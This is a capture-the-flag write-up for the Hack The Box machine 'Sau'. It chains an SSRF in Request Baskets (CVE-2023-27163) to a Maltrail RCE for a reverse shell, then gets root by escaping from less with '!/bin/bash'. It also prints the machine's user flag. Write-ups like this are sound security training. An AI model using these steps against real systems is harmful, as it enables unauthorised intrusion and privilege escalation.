Sau (machine)
by k0d14k
Sau it's a machine provided by hackTheBox. Initially, if you try to access it using a browser, it doesn't respond.
The provided IP is reachable using ping so let's check it with nmap.
The Nmap result reveals some useful information:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
| 256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_ 256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp filtered http
55555/tcp open unknown
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Sun, 10 Dec 2023 12:30:13 GMT
| Content-Length: 75
| invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
| GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Content-Type: text/html; charset=utf-8
| Location: /web
| Date: Sun, 10 Dec 2023 12:29:45 GMT
| Content-Length: 27
| href="/web">Found</a>.
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: GET, OPTIONS
| Date: Sun, 10 Dec 2023 12:29:45 GMT
|_ Content-Length: 0
Reading about this application I notice that this is an instance of Request Baskets. This application allows the creation of some baskets to intercept HTTP requests.
When you create a new Basket the application will return you a name and a token.
Fortunately, the footer reveals the Request Baskets version, and with some Googleing I found a CVE that can be useful: CVE-2023-27163.
This is an SSRF vulnerability over the name field in Request baskets. This is so useful because in this way We can try to access the service exposed over port 80.
Simply, the PoC gets 2 parameters, the host used to create a new basket and the forwarding URL for the basket. Now the software will create a basket with a localhost forwarding URL and We became able to read reserved information and explore reserved services.
Now If We try to access the provided URL the vulnerable software will redirect our request to the 80 port exposed service.
As We can see the hidden service was an instance of Maltrail. I remember that Maltrail has an RCE vulnerability from another CTF and Google confirmed my thesis with a Python exploit: Here
Now, simply by opening a netcat listener and running the exploit, We will get a reverse shell.
And there We go (I stabilize the reverse shell using python as exposed here):
So, We get 3 new information:
- The user is called puma
- The user's flag is e852a6288dd98484bec3c5728ae6413b
- The user can run the command sudo /usr/bin/systemctl status trail.service
If We try to run this command the notice that the shell calls the less command to reduce the amount of printed information.
And this is an unforgivable mistake. because the command less, when is used in a SUID execution, is a known Privilege Escalation Vector.
Simply digit with your keyboard !/bin/bash and then press ENTER:
Very well, We are root now and We can get the latest flag.